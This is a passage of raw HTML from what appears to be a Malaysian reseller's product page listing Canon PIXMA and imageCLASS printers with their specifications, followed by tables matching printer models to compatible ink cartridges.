alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/d6c6807e1827411dade7426d7b93df91_E42XX_AS_FR_op3_blk_en-v1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/d6c6807e1827411dade7426d7b93df91_E42XX_AS_FR_op3_blk_en-v1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Compact Wireless All-In-One with Fax and automatic 2-sided printing for Low-Cost Printing</p><p>This compact Office All-In-One features a 20-sheet Auto Document Feeder for productivity and delivers up to 400 pages yield with high-capacity ink cartridges.</p><p>Print, Scan, Copy, Fax</p><p>ISO standard print speed (A4): 8.8ipm black / 4.4ipm colour</p><p>Hi-speed USB 2.0, WiFi, Mopria, AirPrint, Wireless Direct</p><p>Recommended print volume: 50 - 200 pages</p><center>[maxbutton id=\"11\" ]</center>		\n			<h4>PIXMA TS9570</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/099574dcdd504b0cbb4abac1a221c06e_TS95XX_AS_FR_cl_blk_en-v3.3.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/099574dcdd504b0cbb4abac1a221c06e_TS95XX_AS_FR_cl_blk_en-v3.3.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/099574dcdd504b0cbb4abac1a221c06e_TS95XX_AS_FR_cl_blk_en-v3.3-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>A3 Wireless Photo Printer with Large 4.3â€ Touch-Screen and Auto Document Feeder</p><p>This A3 wireless compact Photo All-In-One printer combines amazing compactness and a wide range of printing options for the complete home and small office printing experience.</p><p>Print, Scan, Copy</p><p>ISO standard print speed (A4): up to 15.0ipm black / 10.0ipm colour</p><p>Hi-speed USB 2.0, WiFi, wired LAN, memory card slot, wireless/wired LAN PictBridge, Mopria, AirPrint, BLE, Wireless Direct</p><p>Recommended print volume: 80 - 300 pages</p><center>[maxbutton id=\"11\" ]</center>		\n			<h4>PIXMA TS8270</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/6d6849f01d6c4e57b1c4a71de1bcd439_TS82XX_AS_SK_op3_blk_en-v1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/6d6849f01d6c4e57b1c4a71de1bcd439_TS82XX_AS_SK_op3_blk_en-v1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/6d6849f01d6c4e57b1c4a71de1bcd439_TS82XX_AS_SK_op3_blk_en-v1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Wireless Photo All-In-One with Large 4.3â€ Touch-Screen and Auto Duplex Printing</p><p>This advanced wireless Photo All-In-One is beautifully designed with a wide range of printing options for the complete home printing experience.</p><p>Available in Black, Red and White.</p><p>Print, Scan, Copy</p><p>ISO standard print speed (A4): up to 15.0ipm black / 10.0ipm colour</p><p>Hi-speed USB 2.0, WiFi, memory card slot, wireless Pictbridge, Mopria, AirPrint, BLE, Wireless Direct</p><p>Recommended print volume: 30 - 100 pages</p><center></center><center></center><center></center><center></center><center></center><center>[maxbutton id=\"11\" ]</center>		\n			<h4>PIXMA G2010</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/1ae3c86cb64b465c9683e7c860d92b25_PIXMAG2010_1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/1ae3c86cb64b465c9683e7c860d92b25_PIXMAG2010_1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/1ae3c86cb64b465c9683e7c860d92b25_PIXMAG2010_1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Refillable Ink Tank All-In-One for High Volume Printing</p><p>Designed for high volume printing at low running cost</p><p>Print, Scan &amp; Copy</p><p>ISO Standard print speed (A4): up to 8.8ipm black / 5.0ipm colour</p><p>Hi-speed USB 2.0</p><p>Recommended print volume: 150 - 1500 pages</p><center>[maxbutton id=\"11\" ]</center>		\n			<h4>PIXMA G4010</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/095399e7118a4e898b6df8c1808358de_g4010_03.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/095399e7118a4e898b6df8c1808358de_g4010_03.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/095399e7118a4e898b6df8c1808358de_g4010_03-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Refillable Ink Tank All-In-One for High Volume Printing</p><p>Designed for high volume printing at low running cost.</p><p>Print, Scan, Copy and Fax</p><p>ISO Standard print speed (A4): up to 8.8ipm black / 5.0ipm colour</p><p>Hi-speed USB 2.0, WiFi, Mopria, AirPrint, Access Point Mode</p><p>Recommended print volume: 150 - 1500 pages</p><center>[maxbutton id=\"11\" ]</center>		\n			<h4>PIXMA G1010</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/7e8a12fd533e44278de28d2734874949_PIXMAG1010_4.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/7e8a12fd533e44278de28d2734874949_PIXMAG1010_4.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/7e8a12fd533e44278de28d2734874949_PIXMAG1010_4-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Refillable Ink Tank Printer for High Volume Printing</p><p>Designed for high volume printing at low running cost</p><p>Print</p><p>ISO Standard print speed (A4): up to 8.8ipm (mono) / 5.0ipm (colour)</p><p>Photo Speed (4 x 6\"): 60sec. (borderless)</p><center>[maxbutton id=\"11\" ]</center>		\n			<h4>PIXMA G3010</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/abbc0420f899426c86b9f547f8e0476d_g3010_01.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/abbc0420f899426c86b9f547f8e0476d_g3010_01.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/abbc0420f899426c86b9f547f8e0476d_g3010_01-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Refillable Ink Tank Wireless All-In-One for High Volume Printing</p><p>Designed for high volume printing at low running cost</p><p>Print, Scan &amp; Copy</p><p>ISO Standard print speed (A4): up to 8.8ipm black / 5.0ipm colour</p><p>Hi-speed USB 2.0, WiFi, Mopria, Access Point Mode</p><p>Recommended print volume: 150 - 1500 pages</p><center>[maxbutton id=\"11\" ]</center>		\n			<h2>Laser Printers :-</h2>		\n			<h4>imageCLASS LBP113w</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/74f5403ab44740bc9c8fd1c01ab53d26_LBP113w-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/74f5403ab44740bc9c8fd1c01ab53d26_LBP113w-1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/74f5403ab44740bc9c8fd1c01ab53d26_LBP113w-1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p><strong>Compact with wireless connectivity</strong></p><p>Simple to operate and compact in size, the ideal choice for your printing needs.</p><ul><li>Print</li><li>Print Speed (A4): Up to 22ppm</li><li>Recommended monthly print volume: 250 - 2,500 pages</li><li>First Print Out Time (A4): Approx. 6.5 sec</li><li>Print resolution: Up to 2,400 (equivalent) Ã— 600 dpi</li><li>Mobile Connectivity.</li></ul><center>[maxbutton id=\"11\" ]</center>		\n			<h4>imageCLASS MF269dw</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/14e8362b0db44a5daaf2af034760fc58_MF269dw-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/14e8362b0db44a5daaf2af034760fc58_MF269dw-1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/14e8362b0db44a5daaf2af034760fc58_MF269dw-1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n<p><strong>The Multifunction printing solution with Duplex Auto Document Feeder (DADF)</strong></p>\nEnjoy greater efficiency. With the duplex auto document feeder, ensure shorter copying and scanning times.\n<ul>\n 	<li>Print, Scan, Copy, Fax</li>\n 	<li>Print Speed (A4): Up to 28ppm</li>\n 	<li>Recommended monthly print volume: 250 - 2,500 pages</li>\n 	<li>FPOT: Approx. 5.2 sec</li>\n 	<li>Max. paper input capacity: 251 sheets</li>\n 	<li>Print resolution: 1,200 Ã— 1,200 dpi (equivalent)</li>\n</ul><center>[maxbutton id=\"11\" ]</center>		\n			<h4>imageCLASS MF266dn</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/f8389aa599cc42db986e698ac364f9fc_MF266dn-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/f8389aa599cc42db986e698ac364f9fc_MF266dn-1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/f8389aa599cc42db986e698ac364f9fc_MF266dn-1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n<p><strong>The Multifunction printing solution with Mobile Printing and Network</strong></p>\nFeaturing Network printing and SEND technology, MF266dn is the productive choice for your business operations.\n<ul>\n 	<li>Print, Scan, Copy, Fax</li>\n 	<li>Print Speed (A4): Up to 28ppm</li>\n 	<li>Recommended monthly print volume: 250 - 2,500 pages</li>\n 	<li>FPOT: Approx. 5.2 sec</li>\n 	<li>Max. paper input capacity: 251 sheets</li>\n 	<li>Print resolution: 1,200 Ã— 1,200 dpi (equivalent)</li>\n</ul><center>[maxbutton id=\"11\" ]</center>		\n			<h4>imageCLASS MF913w</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/7583474b04984f42b18e94fe91075ec9_MF913w-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/7583474b04984f42b18e94fe91075ec9_MF913w-1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/7583474b04984f42b18e94fe91075ec9_MF913w-1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n<p><strong>Compact All-in-One with wireless connectivity, bundled with three toner cartridges</strong></p>\nSimple solution to your print, scan and copy needs. The small footprint fits desktops with limited space perfectly. Bundled with 3 toners, you can print up to 7,500 pages with low cost per print.\n<ul>\n 	<li>Print, Scan, Copy</li>\n 	<li>Print Speed (A4): Up to 22ppm</li>\n 	<li>Recommended monthly print volume: 250 - 2,500 pages</li>\n 	<li>FPOT: Approx. 6.5 sec</li>\n 	<li>Max. paper input capacity: Up to 150 sheets</li>\n 	<li>Print resolution: Up to 2,400 (equivalent) Ã— 600 dpi</li>\n</ul>\n<center>[maxbutton id=\"11\" ]</center>		\n			<h4>imageCLASS MF113w</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/e2fa8e1c70b54636a6922a5d483f3250_MF113w-2.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/e2fa8e1c70b54636a6922a5d483f3250_MF113w-2.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/e2fa8e1c70b54636a6922a5d483f3250_MF113w-2-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n<p><strong>Compact All-in-One with wireless connectivity</strong></p>\nSimple solution to your print, scan and copy needs. The small footprint fits desktops with limited space perfectly. Equipped with built-in Wi-Fi and access point capability.\n<ul>\n 	<li>Print, Scan, Copy</li>\n 	<li>Print Speed (A4): Up to 22ppm</li>\n 	<li>Recommended monthly print volume: 250 - 2,500 pages</li>\n 	<li>FPOT: Approx. 6.5 sec</li>\n 	<li>Max. paper input capacity: Up to 150 sheets</li>\n 	<li>Print resolution: Up to 2,400 (equivalent) Ã— 600 dpi</li>\n</ul>\n<center>[maxbutton id=\"11\" ]</center>\n			<h4>imageCLASS LBP913w</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/bebe20358b144d6a9208a36dabdf2a3e_LBP913w-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/bebe20358b144d6a9208a36dabdf2a3e_LBP913w-1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/bebe20358b144d6a9208a36dabdf2a3e_LBP913w-1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n<p><strong>Compact with wireless connectivity, bundled with 3 cartridges</strong></p>\nKeep printing simple. The compact size fits desktops with limited space perfectly. Bundled with 3 toners, you can print up to 7,500 pages with low cost per print.\n<ul>\n 	<li>Print</li>\n 	<li>Print Speed (A4): Up to 22ppm</li>\n 	<li>Recommended monthly print volume: 250 - 2,500 pages</li>\n 	<li>First Print Out Time (A4): Approx. 6.5 sec</li>\n 	<li>Print Resolution: Up to 2,400 (equivalent) Ã— 600 dpi</li>\n 	<li>Mobile Printing</li>\n</ul><center>[maxbutton id=\"11\" ]</center>		\n			<h4>imageCLASS MF525x</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/3fd4600fbc4b454ca6a98e1186caa1a7_imageclass-mf525x_01.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/3fd4600fbc4b454ca6a98e1186caa1a7_imageclass-mf525x_01.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/3fd4600fbc4b454ca6a98e1186caa1a7_imageclass-mf525x_01-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\nSmarter way to improve office productivity and work efficiency. Equipped with innovative solution in a robust, compact design, the MF525x integrates seamlessly into busy offices and workgroups.\n<ul>\n 	<li>Print, Scan, Copy, Fax</li>\n 	<li>Print Speed (A4): Up to 43ppm</li>\n 	<li>Recommended monthly print volume: 2,000 - 7,500 pages</li>\n 	<li>FPOT: 6.2secs. (A4)</li>\n 	<li>Max. paper input capacity: Up to 2,300 sheets</li>\n 	<li>Print Resolution: Up to 1200 x 1200dpi (equivalent)</li>\n</ul>\n<center>[maxbutton id=\"11\" ]</center>		\n			<h4>imageCLASS MF426dw</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/3ed8c0ae6e8d4e3c9c7122fec0cd35f4_imageclass-mf426dw_b1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/3ed8c0ae6e8d4e3c9c7122fec0cd35f4_imageclass-mf426dw_b1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/3ed8c0ae6e8d4e3c9c7122fec0cd35f4_imageclass-mf426dw_b1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n<p><strong>Compact 4-in-1 Black and White Multifunction for the smart business</strong></p>\nWith cutting-edge features, the MF426dw is set to boost work productivity in the modern office.\n<ul>\n 	<li>Print, Scan, Copy, Fax</li>\n 	<li>Print Speed (A4): Up to 38ppm</li>\n 	<li>Recommended monthly print volume: 750 - 4,000 pages</li>\n 	<li>FPOT: 5.5secs. (A4)</li>\n 	<li>Max. paper input capacity: Up to 900 sheets</li>\n 	<li>Print Resolution: Up to 1200 x 1200dpi (equivalent)</li>\n</ul>\n<center>[maxbutton id=\"11\" ]</center>		\n			<h2>Cartridge Printers :-</h2>		\n		<table border=\"1\" width=\"378\">\n<tbody>\n<tr align=\"center\">\n<td width=\"170\"><strong>Model</strong></td>\n<td width=\"208\"><strong>Cartridge / Bottle</strong></td>\n</tr>\n<tr>\n<td rowspan=\"13\" align=\"center\">imagePROGRAF PRO-500</td>\n<td>Maintenance Cartridge MC-20</td>\n</tr>\n<tr>\n<td>PFI-50 (Blue)</td>\n</tr>\n<tr>\n<td>PFI-50 (Chroma Optimizer)</td>\n</tr>\n<tr>\n<td>PFI-50 (Cyan)</td>\n</tr>\n<tr>\n<td>PFI-50 (Gray)</td>\n</tr>\n<tr>\n<td>PFI-50 (Magenta)</td>\n</tr>\n<tr>\n<td>PFI-50 (Matte Black)</td>\n</tr>\n<tr>\n<td>PFI-50 (Photo Black)</td>\n</tr>\n<tr>\n<td>PFI-50 (Photo Cyan)</td>\n</tr>\n<tr>\n<td>PFI-50 (Photo Gray)</td>\n</tr>\n<tr>\n<td>PFI-50 (Photo Magenta)</td>\n</tr>\n<tr>\n<td>PFI-50 (Red)</td>\n</tr>\n<tr>\n<td>PFI-50 (Yellow)</td>\n</tr>\n<tr>\n<td rowspan=\"8\" align=\"center\">MAXIFY iB4170</td>\n<td>PGI-2700 (Black)</td>\n</tr>\n<tr>\n<td>PGI-2700 (Cyan)</td>\n</tr>\n<tr>\n<td>PGI-2700 (Magenta)</td>\n</tr>\n<tr>\n<td>PGI-2700 (Yellow)</td>\n</tr>\n<tr>\n<td>PGI-2700XL (Black)</td>\n</tr>\n<tr>\n<td>PGI-2700XL (Cyan)</td>\n</tr>\n<tr>\n<td>PGI-2700XL (Magenta)</td>\n</tr>\n<tr>\n<td>PGI-2700XL (Yellow)</td>\n</tr>\n<tr>\n<td rowspan=\"8\" align=\"center\">MAXIFY MB5070</td>\n<td>PGI-2700 (Black)</td>\n</tr>\n<tr>\n<td>PGI-2700 (Cyan)</td>\n</tr>\n<tr>\n<td>PGI-2700 (Magenta)</td>\n</tr>\n<tr>\n<td>PGI-2700 (Yellow)</td>\n</tr>\n<tr>\n<td>PGI-2700XL (Black)</td>\n</tr>\n<tr>\n<td>PGI-2700XL (Cyan)</td>\n</tr>\n<tr>\n<td>PGI-2700XL (Magenta)</td>\n</tr>\n<tr>\n<td>PGI-2700XL (Yellow)</td>\n</tr>\n<tr>\n<td rowspan=\"8\" align=\"center\">MAXIFY MB5170</td>\n<td>PGI-2700 (Black)</td>\n</tr>\n<tr>\n<td>PGI-2700 (Cyan)</td>\n</tr>\n<tr>\n<td>PGI-2700 (Magenta)</td>\n</tr>\n<tr>\n<td>PGI-2700 (Yellow)</td>\n</tr>\n<tr>\n<td>PGI-2700XL (Black)</td>\n</tr>\n<tr>\n<td>PGI-2700XL (Cyan)</td>\n</tr>\n<tr>\n<td>PGI-2700XL (Magenta)</td>\n</tr>\n<tr>\n<td>PGI-2700XL (Yellow)</td>\n</tr>\n<tr>\n<td rowspan=\"8\" align=\"center\">MAXIFY MB5370</td>\n<td>PGI-2700 (Black)</td>\n</tr>\n<tr>\n<td>PGI-2700 (Cyan)</td>\n</tr>\n<tr>\n<td>PGI-2700 (Magenta)</td>\n</tr>\n<tr>\n<td>PGI-2700 (Yellow)</td>\n</tr>\n<tr>\n<td>PGI-2700XL (Black)</td>\n</tr>\n<tr>\n<td>PGI-2700XL (Cyan)</td>\n</tr>\n<tr>\n<td>PGI-2700XL (Magenta)</td>\n</tr>\n<tr>\n<td>PGI-2700XL (Yellow)</td>\n</tr>\n<tr>\n<td rowspan=\"8\" align=\"center\">MAXIFY MB5470</td>\n<td>PGI-2700 (Black)</td>\n</tr>\n<tr>\n<td>PGI-2700 (Cyan)</td>\n</tr>\n<tr>\n<td>PGI-2700 (Magenta)</td>\n</tr>\n<tr>\n<td>PGI-2700 (Yellow)</td>\n</tr>\n<tr>\n<td>PGI-2700XL (Black)</td>\n</tr>\n<tr>\n<td>PGI-2700XL (Cyan)</td>\n</tr>\n<tr>\n<td>PGI-2700XL (Magenta)</td>\n</tr>\n<tr>\n<td>PGI-2700XL (Yellow)</td>\n</tr>\n<tr>\n<td rowspan=\"3\" align=\"center\">PIXMA E3170</td>\n<td>CL-57 (Colour)</td>\n</tr>\n<tr>\n<td>CL-57S (Colour)</td>\n</tr>\n<tr>\n<td>PG-47 (Pigment Black)</td>\n</tr>\n<tr>\n<td rowspan=\"3\" align=\"center\">PIXMA E410</td>\n<td>CL-57 (Colour)</td>\n</tr>\n<tr>\n<td>CL-57S (Colour)</td>\n</tr>\n<tr>\n<td>PG-47 (Pigment Black)</td>\n</tr>\n</tbody>\n</table><table border=\"1\" width=\"378\" cellpadding=\"10\">\n<tbody>\n<tr align=\"center\">\n<td width=\"170\"><strong>Model</strong></td>\n<td width=\"208\"><strong>Cartridge / Bottle</strong></td>\n</tr>\n<tr>\n<td rowspan=\"3\" align=\"center\">PIXMA E4270</td>\n<td>CL-57 (Colour)</td>\n</tr>\n<tr>\n<td>CL-57S (Colour)</td>\n</tr>\n<tr>\n<td>PG-47 (Pigment Black)</td>\n</tr>\n<tr>\n<td rowspan=\"3\" align=\"center\">PIXMA E470</td>\n<td>CL-57 (Colour)</td>\n</tr>\n<tr>\n<td>CL-57S (Colour)</td>\n</tr>\n<tr>\n<td>PG-47 (Pigment Black)</td>\n</tr>\n<tr>\n<td rowspan=\"2\" align=\"center\">PIXMA E477</td>\n<td>CL-57S (Colour)</td>\n</tr>\n<tr>\n<td>PG-47 (Pigment Black)</td>\n</tr>\n<tr>\n<td rowspan=\"2\" align=\"center\">PIXMA E480</td>\n<td>CL-57 (Colour)</td>\n</tr>\n<tr>\n<td>PG-47 (Pigment Black)</td>\n</tr>\n<tr>\n<td rowspan=\"2\" align=\"center\">PIXMA E510</td>\n<td>CL-98 (Colour)</td>\n</tr>\n<tr>\n<td>PG-88 (Pigment Black)</td>\n</tr>\n<tr>\n<td rowspan=\"2\" align=\"center\">PIXMA E560</td>\n<td>CL-99 (Colour)</td>\n</tr>\n<tr>\n<td>PG-89 (Pigment Black)</td>\n</tr>\n<tr>\n<td rowspan=\"2\" align=\"center\">PIXMA E560 / E560R</td>\n<td>CL-99 (Colour)</td>\n</tr>\n<tr>\n<td>PG-89 (Pigment Black)</td>\n</tr>\n<tr>\n<td rowspan=\"4\" align=\"center\">PIXMA G1000</td>\n<td>GI-790 (Black)</td>\n</tr>\n<tr>\n<td>GI-790 (Cyan)</td>\n</tr>\n<tr>\n<td>GI-790 (Magenta)</td>\n</tr>\n<tr>\n<td>GI-790 (Yellow)</td>\n</tr>\n<tr>\n<td rowspan=\"4\" align=\"center\">PIXMA G1010</td>\n<td>GI-790 (Black)</td>\n</tr>\n<tr>\n<td>GI-790 (Cyan)</td>\n</tr>\n<tr>\n<td>GI-790 (Magenta)</td>\n</tr>\n<tr>\n<td>GI-790 (Yellow)</td>\n</tr>\n<tr>\n<td rowspan=\"4\" align=\"center\">PIXMA G2010</td>\n<td>GI-790 (Black)</td>\n</tr>\n<tr>\n<td>GI-790 (Cyan)</td>\n</tr>\n<tr>\n<td>GI-790 (Magenta)</td>\n</tr>\n<tr>\n<td>GI-790 (Yellow)</td>\n</tr>\n<tr>\n<td rowspan=\"4\" align=\"center\">PIXMA G3000</td>\n<td>GI-790 (Black)</td>\n</tr>\n<tr>\n<td>GI-790 (Cyan)</td>\n</tr>\n<tr>\n<td>GI-790 (Magenta)</td>\n</tr>\n<tr>\n<td>GI-790 (Yellow)</td>\n</tr>\n<tr>\n<td rowspan=\"4\" align=\"center\">PIXMA G3010</td>\n<td>GI-790 (Black)</td>\n</tr>\n<tr>\n<td>GI-790 (Cyan)</td>\n</tr>\n<tr>\n<td>GI-790 (Magenta)</td>\n</tr>\n<tr>\n<td>GI-790 (Yellow)</td>\n</tr>\n<tr>\n<td rowspan=\"4\" align=\"center\">PIXMA G4010</td>\n<td>GI-790 (Black)</td>\n</tr>\n<tr>\n<td>GI-790 (Cyan)</td>\n</tr>\n<tr>\n<td>GI-790 (Magenta)</td>\n</tr>\n<tr>\n<td>GI-790 (Yellow)</td>\n</tr>\n<tr>\n<td rowspan=\"2\" align=\"center\">PIXMA iP100</td>\n<td>CLI-36 (Colour)</td>\n</tr>\n<tr>\n<td>PGI-35 (Pigment Black)</td>\n</tr>\n<tr>\n<td rowspan=\"2\" align=\"center\">PIXMA iP110</td>\n<td>CLI-36 (Colour)</td>\n</tr>\n<tr>\n<td>PGI-35 (Pigment Black)</td>\n</tr>\n<tr>\n<td rowspan=\"2\" align=\"center\">PIXMA iP110 (with battery)</td>\n<td>CLI-36 (Colour)</td>\n</tr>\n<tr>\n<td>PGI-35 (Pigment Black)</td>\n</tr>\n<tr>\n<td rowspan=\"3\" align=\"center\">PIXMA iP1300</td>\n<td>CL-41 (Colour)</td>\n</tr>\n<tr>\n<td>PG-40 (Pigment Black)</td>\n</tr>\n<tr>\n<td>PG-40/CL-41 Value Pack</td>\n</tr>\n<tr>\n<td rowspan=\"6\" align=\"center\">PIXMA iP2770 / iP2772</td>\n<td>CL-811 (Colour)</td>\n</tr>\n<tr>\n<td>CL-811XL (Colour)</td>\n</tr>\n<tr>\n<td>PG-810 (Pigment Black)</td>\n</tr>\n<tr>\n<td>PG-810 Twin Pack</td>\n</tr>\n<tr>\n<td>PG-810/CL-811 Value Pack</td>\n</tr>\n<tr>\n<td>PG-810XL (Pigment Black)</td>\n</tr>\n<tr>\n<td rowspan=\"4\" align=\"center\">PIXMA iP2870S</td>\n<td>CL-746 (Colour)</td>\n</tr>\n<tr>\n<td>CL-746S (Colour)</td>\n</tr>\n<tr>\n<td>PG-745 (Pigment Black)</td>\n</tr>\n<tr>\n<td>PG-745S (Pigment Black)</td>\n</tr>\n</tbody>\n</table><p>Â </p><table border=\"1\" width=\"378\" cellpadding=\"10\"><tbody><tr><td width=\"170\"><strong>Model</strong></td><td width=\"208\"><strong>Cartridge / Bottle</strong></td></tr><tr><td rowspan=\"5\" align=\"center\">PIXMA iP4200</td><td>CLI-8 (Black)</td></tr><tr><td>CLI-8 (Cyan)</td></tr><tr><td>CLI-8 (Magenta)</td></tr><tr><td>CLI-8 (Yellow)</td></tr><tr><td>PGI-5 (Pigment Black)</td></tr><tr><td rowspan=\"10\" align=\"center\">PIXMA iP7270</td><td>CLI-751 (Black)</td></tr><tr><td>CLI-751 (Cyan)</td></tr><tr><td>CLI-751 (Magenta)</td></tr><tr><td>CLI-751 (Yellow)</td></tr><tr><td>CLI-751XL (Black)</td></tr><tr><td>CLI-751XL (Cyan)</td></tr><tr><td>CLI-751XL (Magenta)</td></tr><tr><td>CLI-751XL (Yellow)</td></tr><tr><td>PGI-750 (Pigment Black)</td></tr><tr><td>PGI-750XL (Pigment Black)</td></tr><tr><td rowspan=\"12\" align=\"center\">PIXMA iP8770</td><td>CLI-751 (Black)</td></tr><tr><td>CLI-751 (Cyan)</td></tr><tr><td>CLI-751 (Gray)</td></tr><tr><td>CLI-751 (Magenta)</td></tr><tr><td>CLI-751 (Yellow)</td></tr><tr><td>CLI-751XL (Black)</td></tr><tr><td>CLI-751XL (Cyan)</td></tr><tr><td>CLI-751XL (Gray)</td></tr><tr><td>CLI-751XL (Magenta)</td></tr><tr><td>CLI-751XL (Yellow)</td></tr><tr><td>PGI-750 (Pigment Black)</td></tr><tr><td>PGI-750XL (Pigment Black)</td></tr><tr><td rowspan=\"11\" align=\"center\">PIXMA iX6770</td><td>CLI-751 (Black)</td></tr><tr><td>CLI-751 (Cyan)</td></tr><tr><td>CLI-751 (Magenta)</td></tr><tr><td>CLI-751 (Yellow)</td></tr><tr><td>CLI-751XL (Black)</td></tr><tr><td>CLI-751XL (Cyan)</td></tr><tr><td>CLI-751XL (Magenta)</td></tr><tr><td>CLI-751XL (Yellow)</td></tr><tr><td>PGI-750 (Pigment Black)</td></tr><tr><td>PGI-750XL (Pigment Black)</td></tr><tr><td>PGI-755XXL (Pigment Black)</td></tr><tr><td rowspan=\"11\" align=\"center\">PIXMA iX6870</td><td>CLI-751 (Black)</td></tr><tr><td>CLI-751 (Cyan)</td></tr><tr><td>CLI-751 (Magenta)</td></tr><tr><td>CLI-751 (Yellow)</td></tr><tr><td>CLI-751XL (Black)</td></tr><tr><td>CLI-751XL (Cyan)</td></tr><tr><td>CLI-751XL (Magenta)</td></tr><tr><td>CLI-751XL (Yellow)</td></tr><tr><td>PGI-750 (Pigment Black)</td></tr><tr><td>PGI-750XL (Pigment Black)</td></tr><tr><td>PGI-755XXL (Pigment Black)</td></tr><tr><td rowspan=\"6\" align=\"center\">PIXMA MG2570S</td><td>CL-746 (Colour)</td></tr><tr><td>CL-746S (Colour)</td></tr><tr><td>CL-746XL (Colour)</td></tr><tr><td>PG-745 (Pigment Black)</td></tr><tr><td>PG-745S (Pigment Black)</td></tr><tr><td>PG-745XL (Pigment Black)</td></tr><tr><td rowspan=\"6\" align=\"center\">PIXMA MG2577S</td><td>CL-746 (Colour)</td></tr><tr><td>CL-746S (Colour)</td></tr><tr><td>CL-746XL (Colour)</td></tr><tr><td>PG-745 (Pigment Black)</td></tr><tr><td>PG-745S (Pigment Black)</td></tr><tr><td>PG-745XL (Pigment Black)</td></tr></tbody></table>  <table width=\"378\" border=\"1\" cellpadding=\"10\">\n    <tbody>\n    <tr>\n      <td width=\"170\"><strong>Model</strong></td>\n      <td width=\"208\"><strong>Cartridge / Bottle</strong></td>\n    </tr>\n    <tr>\n      <td rowspan=\"5\" align=\"center\">PIXMA MG3570</td>\n      <td>CL-741 (Colour)</td>\n    </tr>\n    <tr>\n      <td>CL-741XL (Colour)</td>\n    </tr>\n    <tr>\n      <td>PG-740 (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td>PG-740/CL-741 Value Pack</td>\n    </tr>\n    <tr>\n      <td>PG-740XL (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td rowspan=\"5\" align=\"center\">PIXMA MG3670</td>\n      <td>CL-741 (Colour)</td>\n    </tr>\n    <tr>\n      <td>CL-741XL (Colour)</td>\n    </tr>\n    <tr>\n      <td>PG-740 (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td>PG-740/CL-741 Value Pack</td>\n    </tr>\n    <tr>\n      <td>PG-740XL (Pigment 